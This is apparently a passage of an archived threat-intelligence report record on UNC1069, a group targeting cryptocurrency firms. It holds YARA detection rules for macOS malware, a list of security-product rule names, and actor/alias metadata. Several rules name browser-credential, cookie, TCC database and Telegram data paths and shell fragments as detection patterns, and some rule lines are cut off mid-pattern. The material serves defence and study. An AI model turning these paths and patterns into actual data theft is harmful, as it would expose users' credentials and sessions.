\"__Z7Execute\"\r\ncondition:\r\nall of them\r\n}\r\nrule G_Downloader_HYPERCALL_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_created = \"2025-10-24\"\r\ndate_modified = \"2025-10-24\"\r\nrev = 1\r\nstrings:\r\n$go_build = \"Go build ID:\"\r\n$go_inf = \"Go buildinf:\"\r\n$lib1 = \"/inject_mac/inject.go\"\r\n$lib2 = \"github.com/gorilla/websocket\"\r\n$func1 = \"t_loader/inject_mac.Inject\"\r\n$func2 = \"t_loader/common.rc4_decode\"\r\n$c1 = { 48 BF 00 AC 23 FC 06 00 00 00 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 32 48 8B 52\r\n$c2 = { 48 89 D6 48 F7 EA 48 01 DA 48 01 CA 48 C1 FA 1A 48 C1 FE 3F 48 29 F2 48 69 D2 00 E1 F5 05 48 29\r\ncondition:\r\n(uint32(0) == 0xfeedface or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcefaedf\r\n}\r\nrule G_Backdoor_SILENCELIFT_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nmd5 = \"4e4f2dfe143ba261fd8a18d1c4b58f2e\"\r\ndate_created = \"2025/10/23\"\r\ndate_modified = \"2025/10/28\"\r\nrev = 2\r\nstrings:\r\n$ss1 = \"/usr/libexec/PlistBuddy -c \\\"print :IOConsoleUsers:0:CGSSessionScreenIsLocked\\\" /dev/stdin 2\u003e/de\r\n$ss2 = \"pkill -CONT -f\" ascii fullword\r\n$ss3 = \"pkill -STOP -f\" ascii fullword\r\n$ss4 = \"/Library/Caches/.Logs.db\" ascii fullword\r\n$ss5 = \"/Library/Caches/.evt_\"\r\n$ss6 = \"{\\\"bot_id\\\":\\\"\"\r\n$ss7 = \"\\\", \\\"status\\\":\"\r\n$ss8 = \"/Library/Fonts/.analyzed\" ascii fullword\r\ncondition:\r\nall of them\r\n}\r\nrule G_APTFIN_Downloader_SUGARLOADER_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nmd5 = \"3712793d3847dd0962361aa528fa124c\"\r\ndate_created = \"2025/10/15\"\r\ndate_modified = \"2025/10/15\"\r\nrev = 1\r\nstrings:\r\n$ss1 = \"/Library/OSRecovery/com.apple.os.config\"\r\n$ss2 = \"/Library/Group Containers/OSRecovery\"\r\n$ss4 = \"_wolfssl_make_rng\"\r\ncondition:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 14 of 16\n\nall of them\r\n}\r\nrule G_APTFIN_Downloader_SUGARLOADER_2 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$m1 = \"__mod_init_func\\x00lko2\\x00\"\r\n$m2 = \"__mod_term_func\\x00lko2\\x00\"\r\n$m3 = \"/usr/lib/libcurl.4.dylib\"\r\ncondition:\r\n(uint32(0) == 0xfeedface or uint32(0) == 0xfeedfacf or uint32(0) == 0xcefaedfe or uint32(0) == 0xcffaedf\r\n}\r\nrule G_Datamine_DEEPBREATH_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\nstrings:\r\n$sa1 = \"-fakedel\"\r\n$sa2 = \"-autodat\"\r\n$sa3 = \"-datadel\"\r\n$sa4 = \"-extdata\"\r\n$sa5 = \"TccClickJack\"\r\n$sb1 = \"com.apple.TCC\\\" as alias\"\r\n$sb2 = \"/TCC.db\\\" as alias\"\r\n$sc1 = \"/group.com.apple.notes\\\") as alias\"\r\n$sc2 = \".keepcoder.Telegram\\\")\"\r\n$sc3 = \"Support/Google/Chrome/\\\")\"\r\n$sc4 = \"Support/BraveSoftware/Brave-Browser/\\\")\"\r\n$sc5 = \"Support/Microsoft Edge/\\\")\"\r\n$sc6 = \"\u0026 \\\"/Local Extension Settings\\\"\"\r\n$sc7 = \"\u0026 \\\"/Cookies\\\"\"\r\n$sc8 = \"\u0026 \\\"/Login Data\\\"\"\r\n$sd1 = \"\\\"cp -rf \\\" \u0026 quoted form of \"\r\ncondition:\r\n(uint32(0) == 0xfeedfacf) and 2 of ($sa*) and 2 of ($sb*) and 3 of ($sc*) and 1 of ($sd*)\r\n}\r\nrule G_Datamine_CHROMEPUSH_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group (GTIG)\"\r\ndate_created = \"2025-11-06\"\r\ndate_modified = \"2025-11-06\"\r\nrev = 1\r\nstrings:\r\n$s1 = \"%s/CA%02d%02d%02d%02d%02d%02d.dat\"\r\n$s2 = \"%s/tmpCA.dat\"\r\n$s3 = \"mouseStates\"\r\n$s4 = \"touch /Library/Caches/.evt_\"\r\n$s5 = \"cp -f\"\r\n$s6 = \"rm -rf\"\r\n$s7 = \"keylogs\"\r\n$s8 = \"%s/KL%02d%02d%02d%02d%02d%02d.dat\"\r\n$s9 = \"%s/tmpKL.dat\"\r\n$s10 = \"OK: Create data.js success\"\r\ncondition:\r\n(uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedf\r\n}\r\nGoogle Security Operations (SecOps)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 15 of 16\n\nGoogle SecOps customers have access to these broad category rules and more under the “Mandiant Intel Emerging Threats”\r\nand “Mandiant Hunting Rules” rule packs. The activity discussed in the blog post is detected in Google SecOps under the\r\nrule names:\r\nApplication Support com.apple Suspicious Filewrites\r\nChrome Native Messaging Directory\r\nChrome Service Worker Directory Deletion\r\nDatabase Staging in Library Caches\r\nmacOS Chrome Extension Modification\r\nmacOS Notes Database Harvesting\r\nmacOS TCC Database Manipulation\r\nSuspicious Access To macOS Web Browser Credentials\r\nSuspicious Audio Hardware Fingerprinting\r\nSuspicious Keychain Interaction\r\nSuspicious Library Font Directory File Write\r\nSuspicious Multi-Stage Payload Loader\r\nSuspicious Permissions on macOS System File\r\nSuspicious SoftwareUpdate Masquerading\r\nSuspicious TCC Database Modification\r\nSuspicious Web Downloader Pipe to ZSH\r\nTelegram Session Data Staging\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering" ], "report_names": [ "unc1069-targets-cryptocurrency-ai-social-engineering" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "0106b19a-ac99-4bc9-90b9-4647bfc5f3ce", "created_at": "2023-11-08T02:00:07.144995Z", "updated_at": "2026-04-10T02:00:03.425891Z", "deleted_at": null, "main_name": "TraderTraitor", "aliases": [ "Pukchong", "Jade Sleet", "UNC4899" ], "source_name": "MISPGALAXY:TraderTraitor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "f87ef0bf-0574-492f-aebc-63e5953938e2", "created_at": "2024-11-23T02:00:04.116692Z", "updated_at": "2026-04-10T02:00:03.779803Z", "deleted_at": null, "main_name": "Gorilla", "aliases": [], "source_name": "MISPGALAXY:Gorilla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "dcbff54d-13ec-40b5-b3b9-b74a315669e1", "created_at": "2026-02-03T02:00:03.428641Z", "updated_at": "2026-04-10T02:00:03.937539Z", "deleted_at": null, "main_name": "UNC1069", "aliases": [ "MASAN", "CryptoCore" ], "source_name": "MISPGALAXY:UNC1069", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434208, "ts_updated_at": 1775826732, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a052ffc6a85eecd3f0a1b632c5fb52bcee845eed.pdf", "text": "https://archive.orkl.eu/a052ffc6a85eecd3f0a1b632c5fb52bcee845eed.txt", "img": "https://archive.orkl.eu/a052ffc6a85eecd3f0a1b632c5fb52bcee845eed.jpg" } }